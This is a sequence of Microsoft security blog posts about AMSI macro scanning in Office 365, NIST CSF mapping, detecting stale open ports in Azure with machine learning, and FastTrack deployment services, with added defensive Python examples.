This protection is also delivered to the rest of Microsoft 365 customers. Through the Microsoft Intelligent Security Graph, security signals are shared across components of Microsoft 365 threat protection. For example, in the case of macro malware, detections of malicious macro-laced documents by Windows Defender AV are shared with Office 365 ATP, which blocks emails carrying the document, stopping attacks before the documents land in users' mailboxes.

Figure 12. The Office and AMSI integration enriches the orchestration of protection across Microsoft 365

Within a few weeks after the release of this new instrumentation in Office VBA and its adoption by Windows Defender ATP, we saw this multiplier effect, with signals from a few hundred devices protecting several tens of thousands of devices. Because the Office AMSI feature exposes the behavior of a macro irrespective of its content, language, or obfuscation, signals from one part of the world translate into protection for the rest of the globe. This is powerful.


AMSI integration is now available and turned on by default on the Monthly Channel for all Office 365 client applications that have the ability to run VBA macros including Word, Excel, PowerPoint, and Outlook.

In its default configuration, macros are scanned at runtime via AMSI except in the following scenarios:

  • Documents opened while macro security settings are set to “Enable All Macros”
  • Documents opened from trusted locations
  • Documents that are trusted documents
  • Documents that contain VBA that is digitally signed by a trusted publisher

Office 365 applications also expose a new policy control for administrators to configure if and when macros are scanned at runtime via AMSI:

  • Group Policy setting name: Macro Runtime Scan Scope
  • Path: User Configuration > Administrative templates > Microsoft Office 2016 > Security Settings

This policy setting specifies for which documents the VBA Runtime Scan feature is enabled.

Disable for all documents: If the feature is disabled for all documents, no runtime scanning of enabled macros will be performed.

Enable for low trust documents: If the feature is enabled for low trust documents, the feature will be enabled for all documents for which macros are enabled except:

  • Documents opened while macro security settings are set to “Enable All Macros”
  • Documents opened from a Trusted Location
  • Documents that are Trusted Documents
  • Documents that contain VBA that is digitally signed by a Trusted Publisher

Enable for all documents: If the feature is enabled for all documents, the classes of documents listed above are no longer excluded from runtime scanning.

This protocol allows the VBA runtime to report to the antivirus system certain high-risk code behaviors it is about to execute, and allows the antivirus to report back to the process when the sequence of observed behaviors indicates likely malicious activity, so that the Office application can take appropriate action.

When this feature is enabled, affected VBA projects’ runtime performance may be reduced.
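To see which documents each setting leaves outside AMSI's view, here is an added Python model of the scope rules above. It is example code written for this page, not part of Office or of the original post. The document trust flags and the sample documents are constructed, and the mapping of the three settings to registry values 0, 1 and 2 under the Office 2016 user policy key is an assumption noted in the code rather than something the post states.

```python
from dataclasses import dataclass
from enum import IntEnum
from typing import Iterable, List


class MacroRuntimeScanScope(IntEnum):
    """The three settings of the 'Macro Runtime Scan Scope' policy described in the post.

    Assumption for this example: the numeric values mirror the DWORD the Office 2016
    ADMX policy writes to HKCU\\Software\\Policies\\Microsoft\\Office\\16.0\\Common\\Security
    (value name MacroRuntimeScanScope). The post itself names only the three settings.
    """
    DISABLE_FOR_ALL = 0
    ENABLE_FOR_LOW_TRUST = 1  # the default behaviour described in the post
    ENABLE_FOR_ALL = 2


@dataclass(frozen=True)
class OpenedDocument:
    """Trust state of a document at the moment its macros are about to run."""
    name: str
    macros_enabled: bool              # macros actually execute (user enabled content, or policy allows)
    enable_all_macros_setting: bool   # Trust Center macro setting is "Enable All Macros"
    from_trusted_location: bool       # opened from a Trusted Location
    is_trusted_document: bool         # marked as a Trusted Document
    signed_by_trusted_publisher: bool # VBA project signed by a Trusted Publisher

    def is_high_trust(self) -> bool:
        """Any of the four exclusions that 'Enable for low trust documents' leaves unscanned."""
        return (self.enable_all_macros_setting or self.from_trusted_location
                or self.is_trusted_document or self.signed_by_trusted_publisher)


def runtime_scan_applies(doc: OpenedDocument, scope: MacroRuntimeScanScope) -> bool:
    """Will the VBA runtime report this document's macro behaviour to AMSI?"""
    if not doc.macros_enabled:
        return False  # nothing executes, so there is nothing for the runtime to report
    if scope == MacroRuntimeScanScope.DISABLE_FOR_ALL:
        return False
    if scope == MacroRuntimeScanScope.ENABLE_FOR_ALL:
        return True
    return not doc.is_high_trust()  # ENABLE_FOR_LOW_TRUST: scan only low-trust documents


def unscanned_documents(docs: Iterable[OpenedDocument], scope: MacroRuntimeScanScope) -> List[str]:
    """Documents whose macros would execute without AMSI visibility under the given scope."""
    return [d.name for d in docs if d.macros_enabled and not runtime_scan_applies(d, scope)]


# Constructed sample documents (not taken from the post).
SAMPLE_DOCS = [
    OpenedDocument("invoice-from-unknown-sender.xlsm", True, False, False, False, False),
    OpenedDocument("vendor-addin.xlsm", True, False, False, False, True),          # signed by a trusted publisher
    OpenedDocument("finance-share-report.docm", True, False, True, False, False),  # opened from a Trusted Location
    OpenedDocument("previously-trusted.docm", True, False, False, True, False),    # user trusted it earlier
    OpenedDocument("macros-blocked.docm", False, False, False, False, False),      # never runs, so never scanned
]


if __name__ == "__main__":
    for scope in MacroRuntimeScanScope:
        print(f"{scope.name}: unscanned = {unscanned_documents(SAMPLE_DOCS, scope)}")
```

Under the default Enable for low trust documents setting, the signed add-in and the documents from a Trusted Location or marked as Trusted Documents run with no runtime reporting. That is the blind spot an attacker gains by planting a file in a Trusted Location or obtaining a certificate the organization trusts; Enable for all documents closes it, at the cost of the performance overhead mentioned above.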

Conclusion: Exposing hidden malicious intent

Macro-based malware continuously evolves and poses detection challenges through techniques like sandbox evasion and code obfuscation. The Antimalware Scan Interface (AMSI)'s integration with Office 365 applications enables runtime scanning of macros, exposing malicious intent even under heavy obfuscation. This latest improvement to Office 365 allows modern endpoint security platforms like Windows Defender ATP to defeat macro-based threats.

Code instrumentation and runtime monitoring are powerful tools for threat protection. Combined with runtime scanning via AMSI, they give antivirus and other security solutions greater visibility into the runtime behavior of a macro execution session at a very granular level, while also seeing past code obfuscation. This enables antivirus solutions to (1) detect a wide range of mutated or obfuscated malware that exhibits the same behavior using a smaller but more efficient set of detection algorithms, and (2) impose more granular restrictions on what macros are allowed to do at runtime.

Moreover, AMSI protection is not limited to macros. Other scripting engines like JavaScript, VBScript, and PowerShell also implement a form of code instrumentation and interface with AMSI. Attacks with multiple stages that use different scripts will be under scrutiny by AMSI at each step, exposing all behaviors and enabling detection by antivirus and other solutions.

We believe this is another step forward in elevating security for Microsoft 365 customers. More importantly, AMSI and Office 365 integration enables the broader ecosystem of security solutions to better detect and protect customers from malicious attacks without disrupting day-to-day productivity.



Giulia Biagini, Microsoft Threat Intelligence Center
Sriram Iyer, Office Security
Karthik Selvaraj, Windows Defender ATP Research





The post Office VBA + AMSI: Parting the veil on malicious macros appeared first on Microsoft Secure.

Categories: cybersecurity

Attending Black Hat USA 2018? Here’s what to expect from Microsoft.

Black Hat USA 2018 brings together professionals at all career levels, encouraging growth and collaboration among academia, world-class researchers, and leaders in the public and private sectors. This is an exciting time as our Microsoft researchers, partners, and security experts will showcase the latest collaborations in defense strategies for cybersecurity, highlight solutions for security vulnerabilities in applications, and bring together an ecosystem of intelligent security solutions. Our objective is to arm business, government, and consumers with deeply integrated intelligence and threat protection capabilities across platforms and products.

Security researchers play an essential role in Microsoft's security strategy and are key to community-based defense. To show our appreciation for their hard work and partnership, each year at Black Hat USA the Microsoft Security Response Center (MSRC) highlights the contributions of these researchers through the list of the Top 100 security researchers reporting to Microsoft (either directly or through a third party) during the previous 12 months. While one criterion for the ranking is the volume of fixed reports a researcher has made, the severity and impact of the reports are also very important to the ranking. Given the number of individuals reporting to Microsoft, anyone ranked among the Top 100 is among the top talent in the industry.

In addition to unveiling the Top 100 and showcasing Microsoft security solutions at Booth #652, there are a number of featured Microsoft speakers and sessions:

Join us at these sessions during the week of August 4-9, 2018 in Las Vegas and continue the discussion with us in Booth #652, where we will have product demonstrations, theatre presentations, and an opportunity to learn more about our Top 100 and meet some of Microsoft's security experts and partners.

Categories: cybersecurity

Microsoft Intelligent Security Association expands with new members and products

Last April, we introduced the Microsoft Intelligent Security Association, a group of 19 security technology providers who have integrated their solutions with a select set of Microsoft products to provide customers better protection, detection, and response.

Today, we are pleased to announce five new members have agreed to join the association: Duo Security, Fortinet, Trusona, Yubico, and Contrast Security. Microsoft is committed to growing the association with partners who can help increase the digital safety of our mutual customers.

In addition to these new members, we are also announcing the addition of Microsoft Cloud App Security, expanding the products included in the program. Cloud App Security gives you visibility into your cloud apps and services, provides sophisticated analytics to identify and combat cyberthreats, and enables you to control how your data travels. We are thrilled that existing members Zscaler and Forcepoint have integrated with our Cloud App Security product to increase its capabilities in new and exciting ways.

Microsoft is excited by the initial reaction to the Microsoft Intelligent Security Association, and we are committed to continuing to build on this early momentum.

Categories: Uncategorized

Assessing Microsoft 365 security solutions using the NIST Cybersecurity Framework

This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series, you'll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog: New FastTrack benefit: Deployment support for Co-management on Windows 10 devices.

Microsoft 365 security solutions align to many cybersecurity protection standards. One widely adopted standard is the National Institute of Standards and Technology Cybersecurity Framework (NIST CSF). Developed for the US government, NIST CSF is now also used by governments and enterprises worldwide as a best practice for managing cybersecurity risk. Mapping your Microsoft 365 security solutions to NIST CSF can also help you achieve compliance with certifications and regulations such as FedRAMP.

Microsoft 365 security solutions are designed to help you empower your users to do their best work securely, from anywhere and with the tools they love. Our security philosophy is built on four pillars: identity and access management, threat protection, information protection, and security management. Microsoft 365 E5 (see Figure 1) includes products for each pillar that work together to keep your organization safe.

Figure 1. The Microsoft 365 security solutions

At the heart of NIST CSF is the Cybersecurity Framework Core, a set of Functions and related outcomes for improving cybersecurity (see Figure 2). In this blog, we'll show you examples of how you can assess Microsoft 365 security capabilities using four of the Function areas in the core: Identify, Protect, Detect and Respond.* We'll also provide practical tips on how you can use Microsoft 365 Security to help achieve key outcomes within each function.

Figure 2. The NIST Cybersecurity Framework Core


Identify

Develop the organizational understanding to manage cybersecurity risk to systems, assets, data, and capabilities.

The purpose of this function is to gain a better understanding of your IT environment and identify exactly which assets are at risk of attack. From there, you can start to align these assets and associated risks to your overall business goals (including regulatory and industry requirements) and prioritize which assets require attention.

For example, the Asset management category is about identifying and managing the data, personnel, devices, and systems that enable an organization to achieve its business purpose, in a way that is consistent with their relative importance to business objectives and the organization's risk strategy.

Microsoft 365 security solutions help identify and manage key assets such as user identities, company data, PCs and mobile devices, and the cloud apps used by company employees. First, provisioning user identities in Microsoft Azure Active Directory (Azure AD) provides fundamental asset and user identity management that includes application access, single sign-on, and device management. Through Azure AD Connect, you can integrate your on-premises directories with Azure AD (see Figure 3). This gives users a common secure identity for Microsoft Office 365, Azure, and thousands of other Software as a Service (SaaS) applications pre-integrated into Azure AD.

Figure 3. Through Azure AD Connect, you can integrate your on-premises directories with Azure Active Directory

Deployment Tip: Start by managing identities in the cloud with Azure AD to get the benefit of single sign-on for all your employees. Azure AD Connect will help you integrate your on-premises directories with Azure AD.


Protect

Develop and implement the appropriate safeguards to ensure delivery of critical infrastructure services.

The Protect function focuses on policies and procedures to protect data from a potential cybersecurity attack.

Microsoft 365 security solutions support the NIST CSF categories in this function. For example, the Identity management and access control category is about managing access to assets by limiting authorization to devices, activities, and transactions. Your first safeguard against threats or attackers is to maintain strict, reliable, and appropriate access control. Azure Active Directory Conditional Access evaluates a set of configurable conditions, including user, device, application, and risk (see Figure 4). Based on these conditions, you can then set the right level of access control. For access control on your networks.

Figure 4. Azure AD Conditional Access evaluates a set of configurable conditions, including user, device, application, and risk

Deployment Tip: Manage access control by configuring conditional access policies in Azure AD. Use conditional access to apply conditions that grant access depending on a range of factors, such as location, device compliance, and employee need.


Detect

Develop and implement the appropriate activities to identify the occurrence of a cybersecurity event.

The Detect function covers systems and procedures that help you monitor your environment and detect a security breach as quickly as possible.

Microsoft 365 security solutions detect and protect against Anomalies and events (a NIST CSF category in this function) in real time. They offer advanced threat protection (see Figure 5), security and audit log management, and application whitelisting to ensure the security and resilience of systems and assets, consistent with related policies, procedures, and agreements. Microsoft 365 has capabilities to detect attacks across these three key attack vectors:

  • Device-based attacks: Windows Defender Advanced Threat Protection provides near-instant detection and blocking of new and emerging threats using advanced file and process behavior monitoring and other heuristics. The Alerts queue shows a list of alerts flagged from machines in your network.
  • Email-based attacks: Office 365 Advanced Threat Protection protects your emails, attachments, online storage, files, and environment through a variety of technologies, including Safe Attachments, Exchange Online Protection, and rich reporting and tracking insights.
  • Identity credential attacks: Azure Advanced Threat Protection (Azure ATP) takes information from logs and network events to learn the behavior of users in the organization and build a behavioral profile of them. It then detects suspicious activities, searching for malicious attacks, abnormal behavior, and security issues and risks.

Figure 5. Threat detection integrated across Microsoft 365


Respond

Response processes and procedures are executed and maintained to ensure timely response to detected cybersecurity events.

The Respond Function provides guidelines for effectively containing a cybersecurity incident once it has occurred through development and execution of an effective incident response plan.

Microsoft 365 security solutions directly support the Response Planning category through a variety of visibility reports and insights. Azure AD access and usage reports allow you to view and assess the integrity and security of your organization's implementation of Azure AD. With this information, you can better determine where possible security risks may lie and plan to mitigate those risks. These reports also support the Mitigation category, and include anomaly reports, integrated application reports, error reports, user-specific reports, and activity logs that contain a record of all audited events within the last 24 hours, last 7 days, or last 30 days. Supporting the Analysis category, Microsoft offers guidance and education on Windows security and forensics to give organizations the ability to investigate cybercriminal activity and respond to and recover from malware incidents more effectively.

Want to Learn More?

For more information and guidance on assessing Microsoft 365 security solutions using the NIST CSF, check out the whitepaper.

Deployment Tip: For more help with Microsoft 365 security, consider FastTrack for Microsoft 365. Whether you're planning your initial Microsoft 365 Security rollout, need to onboard your product, or want to drive end-user adoption, FastTrack is your benefit service and is ready to assist you. Get started at FastTrack for Microsoft 365.

* Although Microsoft offers customers some guidance and tools to help with certain aspects of the fifth function, Recover (data backup, account recovery), Microsoft 365 doesn't specifically address this function. Note also that Microsoft isn't endorsing this NIST framework over others; there are other standards for cybersecurity protection, but we find it helpful to baseline against commonly used scenarios.

More blog posts from this series:

Categories: Uncategorized

The need and opportunity for adaptive prevention in the cloud

This post is authored by Michael Bargury, Data Scientist, C+E Security.

The need

The cloud introduces new security challenges, which differ from classic ones in diversity and scale. Once a Virtual Machine (VM) is up and running with an open internet port, it is almost instantaneously subject to vulnerability scanning and Brute Force (BF) attacks. These attacks are usually not directed at a specific organization's environment. Instead, they cover a broad range of environments, hoping to infiltrate even a small fraction of them, to be used for their computational power or as part of a botnet.

The agile nature of the cloud allows organizations to build elaborate and highly customized environments. These environments constantly change, as customers utilize the cloud's ability to adapt to variations in computational or network communication demands. Although this agility is one of the cloud's top offerings, it also makes it harder to apply and maintain security best practices. As your environment changes, the security measures needed to protect it may change as well. Moreover, while security experts can manually analyze common environment scenarios and offer security recommendations, the huge diversity in the cloud renders these recommendations useless for many organizations, which require more tailored solutions.

Proper security recommendations have the potential to make a huge impact on an organization's security. They can minimize attack surface, essentially blocking attacks before they occur.

The opportunity

On the other hand, the cloud provides unique opportunities, which are impossible or impractical for most organizations on their own. The broad visibility and the diversity of environments allow statistical models to detect abnormal activities across the cloud. Organizations can anonymously share their security-related data with trusted third parties such as Azure Security Center (ASC), which can leverage this data to provide better detection and security recommendations for all organizations. Essentially, the cloud allows organizations to combine their knowledge in a way that is much larger than the sum of its parts.

Leveraging these cloud-unique opportunities gives birth to a whole new world of customized security recommendations. Instead of a single one-size-fits-all best practice, the cloud allows customized best practices to be generated and updated constantly, as a cloud environment is built and evolves. Imagine an agent that detects a security risk associated with a machine placed in the wrong subnet, or an automatically updating firewall.


Let us dive into a very basic, yet typical scenario. As a developer in a cloud-based organization, I would like to deploy a new SQL-Server on Windows. I deploy a new Windows VM, install SQL-Server and create an inbound rule in my Network Security Group (NSG) to allow incoming communication on port 1433.

A few months later, the SQL-Server has long been deleted. The VM is being used for something else entirely. The only thing left from my initial deployment is the inbound rule on port 1433, forgotten by the individual who deleted the SQL-Server. This leaves an opening for malicious actors to gain access to my machine, or simply to cause an overuse of resources by bombarding it with requests. After a while, I get a security alert from ASC. There was a successful BF attack on my machine, and it is now compromised. Looking at the logs, I see that the attack was carried out over port 1433.

A good security recommender system would have identified that port 1433 was no longer in use by SQL Server, and prompted me with a recommendation to close it before the machine was compromised.

Learning scenario

Taking the perspective of a cloud provider, we will now devise a way to detect the scenario mentioned above and recommend a mitigation on time.

We can safely assume that most Azure customers use port 1433 for SQL-Server communication, as it is the default port used in SQL-Server software. This reduces our problem to the following goal: find machines with an inbound rule for port 1433, which do not run SQL-Server software.

But wait, how do we know which SQL-Server software to look for the absence of? We can try to manually devise a list of executables that make up SQL-Server, but there must be a better way.

Remember, we have assumed that most Azure customers use port 1433 for SQL-Server communication. Utilizing this assumption, we can learn which executables are unusually common on machines with an inbound rule on port 1433, compared to the entire population of Azure VMs.

And so, our final goal becomes: find machines with an inbound rule for port 1433 which do not run the executables that are common within this group.

We can try to reach this goal in several ways. Here we take a classification approach. We use two weeks of process execution data from 30K Azure machines that run ASC's monitoring agent.

First, we devise a list of distinct executables. Since we are looking for executables of very common software, we can filter the list down to executables that ran on more than 10 Azure VMs, to reduce noise. This leaves us with 4,361 distinct executables.

We represent each Azure VM as a vector of indicators of the executables run by that VM. For example, consider a VM that ran only a single executable. It would be represented by a zero vector with a single coordinate set to one, at the position of that executable. Next, we label each VM by whether or not it has port 1433 open for inbound traffic.

We will treat our dataset as a classification problem: given a binary feature vector for each VM, predict whether its port 1433 is open for inbound traffic. Notice that we already know the answer to this question. Therefore, we will be able to measure the accuracy of our model.

We train a Random Forest (RF) model to solve the classification problem. We use an RF for multiple reasons. First, each tree considers only a small subset of features at each split, which corresponds to a small number of executables that we hope will be SQL-Server related. Second, allowing only a few trees in the RF will yield a simple classification model, easily interpretable and understandable.

To check for overfitting, we hold out a validation set. We split our dataset 70-30 percent into train and test sets. We train the model on the training set and measure its performance on the test set.

// Error = (# wrong classifications) / (# samples)

Train error = 0.00095

Test error = 0.00128

The model performs very well, with low classification error both for the train and test sets.

Let's think about what happened here. The model was able to accurately predict whether a VM has an inbound rule for port 1433, using a small list of executables run by that VM. This implies that there is some set of executables which are extremely common among VMs that accept inbound traffic on port 1433. To examine these executables, we can look at the top ten features by importance (significance to the classification) provided by our classifier:

  1. \program files\microsoft sql server\mssql_ver.mssqlserver\mssql\binn\sqlagent.exe

  2. \program files\microsoft sql server iaas agent\bin\ma\agentcore.exe

  3. \packages\plugins\microsoft.compute.vmaccessagent\version\bin\jsonvmaccessextension.exe

  4. \program files\microsoft sql server iaas agent\bin\sqlservice.exe

  5. \program files\microsoft sql server\mssqlmssqlserver\mssql\binn\databasemail.exe

  6. \windows\\framework\version\ngen.exe

  7. \program files (x86)\microsoft sql server\version\tools\binn\sqlexe

  8. \packages\plugins\microsoft.sqlmanagement.sqliaasagent\version\sqliaasextensiondeployer.exe

  9. \packages\plugins\microsoft.enterprisecloud.monitoring.microsoftmonitoringagent\version\mmaextensionheartbeatservice.exe

  10. \program files\microsoft sql server\mssqlmssqlserver\mssql\binn\fdhost.exe

This is excellent. Our model found that the best indicators for port 1433 being open are SQL-Server related executables running on the VM. This validates our assumption that most Azure customers use port 1433 for SQL-Server communication! Otherwise, our model would not have been able to reach such high accuracy using SQL-Server executables as features.

Returning to our initial goal, we are looking for machines that do not run the executables that are very common within this group. For these machines, there is no way the model can detect that port 1433 is open by judging from SQL-Server related executables. Hence, these machines should correspond to our model's classification errors! More specifically, we are looking for false negatives (FN: the model wrongly classifies the VM as having port 1433 closed).

Let's examine one of these VMs. Here is the list of executables it ran:

  1. \windows\softwaredistribution\download\install\: [exe, windows-ver-delta.exe]

  2. \windowsazure\guestagent_ver\collectguestlogs.exe

  3. \program files\microsoft security client\mpcmdrun.exe

  4. \windows\servicing\trustedinstaller.exe

  5. \windows\winsxs\amd64_microsoft-windows-servicingstack_ver\tiworker.exe

  6. \program files\microsoft office 15\clientx64\officec2rclient.exe

  7. \program files\java\: [jre_ver\bin\jp2launcher.exe, 8.0_144\bin\javaws.exe]

  8. \program files (x86)\common files\java\java update\jucheck.exe

  9. \windows\\framework64\ver\: [exe, ngen.exe]

  10. \windows\\framework\ver\: [exe, ngentask.exe]

  11. \windows\system32\inetsrv\w3wp.exe

  12. \windows\system32\wbem\: [exe, wmiprvse.exe]

  13. \windows\system32\: [taskhostex.exe, mrt.exe, schtasks.exe, taskeng.exe, wsqmcons.exe, rundll32.exe, sc.exe, lpremove.exe, mpsigstub.exe, ceipdata.exe, defrag.exe, sppsvc.exe, cmd.exe, conhost.exe, svchost.exe, aitagent.exe, taskhost.exe, mrt-ver.exe, sppextcomobj.exe, wermgr.exe, werfault.exe, tzsync.exe, slui.exe]

Indeed, we don't see SQL-Server here! Actually, it seems like this VM is running mostly Windows/Azure updates. We can issue a recommendation for this VM to remove its inbound rule for port 1433. Looking at past ASC alerts, we can see that this machine was brute-forced on six different days, providing valuable attack surface to malicious actors. Our model can put an end to that!

Overall, we found five machines which might have port 1433 open for no reason (the false negatives of the classification model).


Now that we have a working model and a nice Proof of Concept, we might consider applying it to similar scenarios. After all, why focus only on port 1433 and SQL-Server, when our model didn't depend on either of these as an assumption?

We can generalize our scenario and solution to the following:

  • Goal: find machines with an inbound rule for port X which do not run the executables that are very common within this group.
  • Method: Train an RF to predict whether or not a machine has port X open for inbound traffic, based on the executables it ran. Output the machines the RF misclassified as having the port closed (its false negatives).
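As an added example (not the author's model or Azure Security Center code), here is the port 1433 goal stated earlier and its generalization to an arbitrary port X, implemented in plain Python over a small constructed inventory instead of the 30K-machine dataset. In place of the Random Forest it applies the frequency argument the post makes directly: an executable is an indicator for the port if it runs on most port-open VMs and is far more common there than on port-closed VMs (support and lift, with add-one smoothing), and a VM whose inbound rule is present but which runs none of the indicators is the recommendation target, the counterpart of the RF's false negatives. All VM names, executable names and thresholds are made up for illustration.

```python
from collections import Counter
from typing import Dict, List, Set, Tuple

# VM name -> (inbound rule for port X present?, executables observed running on the VM).
# Constructed sample inventory for this example, not data from Azure Security Center.
Inventory = Dict[str, Tuple[bool, Set[str]]]

SAMPLE_INVENTORY: Inventory = {
    "sql-prod-01": (True,  {"sqlservr.exe", "sqlagent.exe", "svchost.exe", "ngen.exe"}),
    "sql-prod-02": (True,  {"sqlservr.exe", "sqlagent.exe", "fdhost.exe", "svchost.exe"}),
    "sql-dev-01":  (True,  {"sqlservr.exe", "databasemail.exe", "svchost.exe"}),
    "sql-dev-02":  (True,  {"sqlservr.exe", "sqlagent.exe", "svchost.exe"}),
    "legacy-web":  (True,  {"w3wp.exe", "svchost.exe", "ngen.exe", "mpcmdrun.exe"}),  # stale rule, no SQL
    "web-01":      (False, {"w3wp.exe", "svchost.exe", "ngen.exe"}),
    "web-02":      (False, {"w3wp.exe", "svchost.exe"}),
    "build-01":    (False, {"msbuild.exe", "svchost.exe", "ngen.exe"}),
    "jump-01":     (False, {"mstsc.exe", "svchost.exe"}),
}


def indicator_executables(inventory: Inventory, min_support: float = 0.5,
                          min_lift: float = 2.0) -> Dict[str, float]:
    """Executables unusually common among VMs that expose the port.

    support: share of port-open VMs that ran the executable (must be >= min_support).
    lift:    smoothed share in the port-open group divided by smoothed share in the
             port-closed group (must be >= min_lift). Add-one smoothing keeps an
             executable never seen on port-closed VMs from dividing by zero.
    Returns {executable: lift}.
    """
    open_group = [exes for is_open, exes in inventory.values() if is_open]
    closed_group = [exes for is_open, exes in inventory.values() if not is_open]
    if not open_group:
        return {}  # nothing exposes the port, so there is nothing to learn from
    open_counts = Counter(exe for exes in open_group for exe in exes)
    closed_counts = Counter(exe for exes in closed_group for exe in exes)
    n_open, n_closed = len(open_group), len(closed_group)

    indicators: Dict[str, float] = {}
    for exe, c_open in open_counts.items():
        support = c_open / n_open
        p_open = (c_open + 1) / (n_open + 2)
        p_closed = (closed_counts[exe] + 1) / (n_closed + 2)
        lift = p_open / p_closed
        if support >= min_support and lift >= min_lift:
            indicators[exe] = round(lift, 2)
    return indicators


def stale_port_rules(inventory: Inventory, indicators: Dict[str, float]) -> List[str]:
    """VMs with the inbound rule present that run none of the indicator executables."""
    if not indicators:
        return []  # no learned software profile for this port, so no basis for a recommendation
    indicator_set = set(indicators)
    return sorted(name for name, (is_open, exes) in inventory.items()
                  if is_open and not (exes & indicator_set))


def recommend_closures(inventory: Inventory, min_support: float = 0.5,
                       min_lift: float = 2.0) -> Tuple[Dict[str, float], List[str]]:
    """Learn what software the port is 'for', then flag VMs exposing it without that software."""
    indicators = indicator_executables(inventory, min_support, min_lift)
    return indicators, stale_port_rules(inventory, indicators)


if __name__ == "__main__":
    indicators, flagged = recommend_closures(SAMPLE_INVENTORY)
    print("indicator executables (lift):", indicators)
    for vm in flagged:
        print(f"recommend: remove the inbound rule on {vm}; no indicator software is running")
```

On the sample inventory, support alone would keep svchost.exe (it runs on every VM) and the stale legacy-web rule would never be flagged; the lift filter drops ubiquitous executables and leaves the SQL-Server processes as indicators, after which legacy-web is the one VM exposing the port without them. Nothing in the functions refers to port 1433, so the same code serves the port X generalization above given an inventory labelled for that port.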


The scenario developed above is only the tip of the iceberg. The Azure Security Center (ASC) team is working hard on providing adaptive prevention capabilities, to enable better security for Azure customers. For information about the first adaptive prevention feature in ASC, see How Azure Security Center uses machine learning to enable adaptive application control. To learn about the use of Machine Learning in ASC, see Machine Learning in Azure Security Center.

Categories: Uncategorized

New FastTrack benefit: Deployment support for Co-management on Windows 10 devices

This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series you'll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog: Getting the most value out of your security deployment.

We are pleased to announce that FastTrack for Microsoft 365 (a benefit of your Microsoft 365 subscription for planning, deployment and adoption) now provides deployment support for Co-management on your Windows 10 devices. I'd like to provide a few highlights on what you can expect.

What is Co-management?

Co-management is the integration between Configuration Manager and Microsoft Intune that enables a Windows 10 device to be managed by Configuration Manager and Intune at the same time. This gives you the opportunity to enable remote actions on the device, like remote factory reset or selective wipe for lost or stolen devices. Additional advantages include conditional access, enabling you to ensure that devices accessing your corporate network are compliant with your company policies and requirements. And with Windows 10 devices you have Windows Autopilot, which automatically enrolls new devices in Intune; this can lower your provisioning costs for new Windows 10 devices from the cloud. Co-management empowers you to complement Configuration Manager with Intune and more easily bring all this together where cloud makes sense for your organization, as seen in Figure 1 below.

Figure 1: Co-management architecture

What can you expect

As part of our deployment support, the FastTrack team will provide guidance on the following activities:

  • Enabling Active Directory auto-enrollment
  • Enabling hybrid Azure Active Directory join
  • Enabling the Cloud Management Gateway
  • Enabling Co-management in Configuration Manager
  • Switching over supported device management capabilities from Configuration Manager to Intune:

    • Device conditional access policies
    • Resource Access profiles
    • Windows Update for Business policies
    • Endpoint Protection policies

  • Setting up Intune to deploy the Configuration Manager agent to new devices

FastTrack for Microsoft 365 benefits

FastTrack continues to invest in bringing you end-to-end services for planning, onboarding and driving adoption of your eligible subscriptions, at no additional charge. It is our commitment to help you realize the value of your Microsoft 365 investment with a faster deployment and time to value.

FastTrack lets you engage with our FastTrack specialists and provides best practices, tools and resources to help you quickly and easily enable Microsoft 365 in your environment, now including co-management for Windows 10 devices.

Get started

To request assistance from FastTrack, you can get started by going to our FastTrack website. Click on the Sign In prompt, and enter your company or school ID. Go to the dashboard, and from there follow the prompts to access the Request for Assistance form. Your submission will be reviewed and routed to the appropriate team that will address your specific needs and eligibility.

The FastTrack website also provides you with best practices, tools, and resources from the experts to help make your deployment experience with the Microsoft Cloud a great one.


Updating your cybersecurity strategy to enable and accelerate digital transformation

This post is authored by Cyril Voisin, Chief Security Advisor, Enterprise Cybersecurity Group.

Nowadays every company is becoming a digital company to some extent. Digital transformation changes the way business is done. For example, it puts more control into the hands of employees, who now demand anytime, anywhere connectivity to the solutions and data they need to accomplish their objectives. Adoption of digital technologies takes place at every level of the organization, and shadow IT reminds us that employees may procure their own IT solutions to be more productive. Solutions require careful security considerations before being approved. Therefore, it's important to redefine your strategy to support both security and productivity, based on sound risk management.

Over the last decade, the security landscape has changed dramatically. Therefore, the security approach must be adapted to a new world of constant change and massive digitalization. With dramatic events such as Wannacry or NotPetya, cybersecurity has become a board conversation. Savvy enterprises now consider cybersecurity risks as strategic, the same way they consider financial risks.

Defining a crisp modern security strategy to support business success

A modern security agenda needs to define the purpose of the security team, its vision and mindset. It should also explain the high-level strategies it will employ, and how it will be organized, including the definition of priorities and deadlines and how the results will be measured. The figure below shows an example of a modern security agenda that can be summarized in a single slide for the purpose of sharing with your executive team.

Download the whitepaper on cybersecurity for digital transformation

More detailed information regarding enabling and accelerating digital transformation is available in this whitepaper. It is designed to articulate what a modern security strategy can look like, and is useful for CISOs, CIOs, CDOs, and potentially board members who want to learn more about secure transformation and benchmark their own teams. It was first released as an exclusive distribution in Dubai in October 2017, and now we are making it more broadly available today.

You can download the whitepaper here.

For more information on deployment planning and FastTrack guidance, check out related deployment series blogs.


Getting the most value out of your security deployment

This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series you'll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog, Now that you have a plan, it's time to start deploying.

In our previous blog, we covered some of the tactical issues that you'll want to consider when planning your Microsoft 365 Security deployment. Now we'll move to the third and final step of an effective planning process: Drive Value.

The Drive Value stage is about helping your employees to embrace and adopt the new tools and processes that are a part of your new Microsoft Security infrastructure.

The FastTrack team can help you create and implement an adoption plan that leads you and your team smoothly out of the test phase and into wider user adoption. Drawing from thousands of customer experiences, we've assembled a variety of proven engagement tactics that you can apply directly to your own rollout. We'll make sure you have the knowledge, support, and materials you need for success.

Your checklist to Drive Value

The following checklist provides some of the items and actions that our FastTrack team can help you with during the Drive Value step:

Implement the adoption plan

  • Going beyond your test group to a broader population of users can be difficult. Having a plan in place to help your users adopt and embrace change will make this easier. Microsoft FastTrack will help you build a multifaceted adoption plan using best practices.

Hold launch and training events

  • Make it informative and fun using Microsoft FastTrack resources to help you drive end-user adoption. One idea is to set up a booth or a kiosk outside your lunch area or host lunch and learn events for your users. These events serve to support your users with face-to-face questions & answers as well as driving excitement and adoption. They are a great way to distribute resources your users can take with them.

Encourage ongoing engagement

